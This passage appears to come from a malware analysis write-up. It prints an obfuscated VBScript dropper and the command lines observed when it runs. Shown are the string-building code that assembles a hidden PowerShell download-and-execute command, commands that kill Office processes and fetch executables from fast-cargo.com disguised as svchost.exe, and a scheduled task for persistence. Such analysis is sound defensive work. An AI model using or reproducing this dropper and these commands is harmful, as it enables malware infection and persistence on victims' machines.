- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "t"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & ")"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
- ASnWnQ2Q87WmxW291DXnw7 = "D"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "o"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "w"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "n"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "l"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "o"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "a"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "d"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "F"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "i"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "l"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "e"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "("
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "'ht"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "tp:/"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "/ww"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "w.fa"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "st-car"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "go.com/images/file"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "/vb/exe/"
- ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "door.exe'"
- ASnWnQ2Q87WmxW291DXnw8 = ","
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "'"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "%"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "P"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "u"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "b"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "l"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "i"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "c"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "%"
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & ""
- ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "s"
- ASnWnQ2Q87WmxW291DXnw9 = "v"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "c"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "h"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "o"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "s"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "ts"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "."
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "e"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "x"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "e"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "'"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & ")"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & ";"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "S"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "t"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "a"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "r"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "t"
- ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "-"
- ASnWnQ2Q87WmxW291DXnw010 = "P"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "r"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "o"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "c"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "e"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "s"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "s "
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "'"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "%"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "P"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "u"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "b"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "l"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "i"
- ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "c"
- ASnWnQ2Q87WmxW291DXnw011 = "%"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & ""
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "s"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "v"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "c"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "h"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "o"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "s"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "ts"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "."
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "e"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "x"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "e"
- ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "'"
- ASnWnQ2Q87WmxW291DXnw12 = ASnWnQ2Q87WmxW291DXnw4 + ASnWnQ2Q87WmxW291DXnw5 + ASnWnQ2Q87WmxW291DXnw6 + ASnWnQ2Q87WmxW291DXnw7 + ASnWnQ2Q87WmxW291DXnw8 + ASnWnQ2Q87WmxW291DXnw9 + ASnWnQ2Q87WmxW291DXnw010 + ASnWnQ2Q87WmxW291DXnw011
- shhh.Run ASnWnQ2Q87WmxW291DXnw12, vbHide
复制代码
- "C:\Windows\System32\cmd.exe" /K taskkill /f /im winword.exe&taskkill /f /im Excel.exe&PowerShell (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/vb/exe/38.exe','C:\Users\Public\svchost.exe');Start-Process 'C:\Users\Public\svchost.exe'
复制代码
- PowerShell (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/vb/exe/38.exe','C:\Users\Public\svchost.exe');Start-Process 'C:\Users\Public\svchost.exe'
复制代码
- "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs
复制代码
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://www.fast-cargo.com/images/file/vb/exe/door.exe','C:\Users\Public\svchosts.exe');Start-Process 'C:\Users\Public\svchosts.exe'
复制代码
衍生物:
[quote][/quote]
|